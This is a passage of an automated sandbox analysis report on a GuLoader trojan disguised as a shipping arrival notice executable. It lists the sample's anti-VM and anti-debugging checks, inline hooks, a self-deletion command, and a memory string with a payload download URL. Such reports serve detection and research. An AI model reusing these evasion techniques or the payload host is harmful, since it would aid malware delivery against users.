      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@10/8
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_004064C4 push ebp; iretd
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0040A8F6 push esi; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00403171 push ds; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00404979 push esi; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00407B84 push es; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790749 push FFFFFF85h; retf
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078089F push 2FA9C30Eh; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007899BC push FFFFFF85h; retf 0805h
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E65D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_00574CB6 push ds; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048BD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817057 push ebx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081B059 push edx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0080E3F4 push edi; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0080E325 push edx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00816B58 push ebp; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081E490 push cs; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00804556 push edi; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEA5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEF2 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEFB push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817622 push FFFFFFC4h; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817636 push ds; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF5C push eax; ret
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: real checksum: 0x791f7 should be: 0x73bc1

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE2
      Self deletion via cmd delete
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Tries to detect Any.run
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://WWW.PAULASSINKARCHITECT.NL/BIN_FDIYU115.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000008098E4 second address: 00000000008098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000809B4E second address: 0000000000809B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\explorer.exe TID: 5076Thread sleep count: 88 > 30
      Source: C:\Windows\explorer.exe TID: 5076Thread sleep time: -176000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790523 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSystem information queried: ModuleInformation
      Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: explorer.exe, 0000000D.00000000.1196380062.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWxL
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258621703.00000000009A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 0000000D.00000000.1213774669.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790523 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078752F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875F9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007918D3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791915 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FCF5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FCB7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078AD21 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078EF53 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E694257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E638E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E618A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E623A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E648EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E604F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E611B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E618794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E687794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E620050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E686C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E687016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E686CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E683884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E643D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E683540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E627D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E624120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E624120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E613D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E634D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63513A mov eax, dword ptr fs:[00000030h]
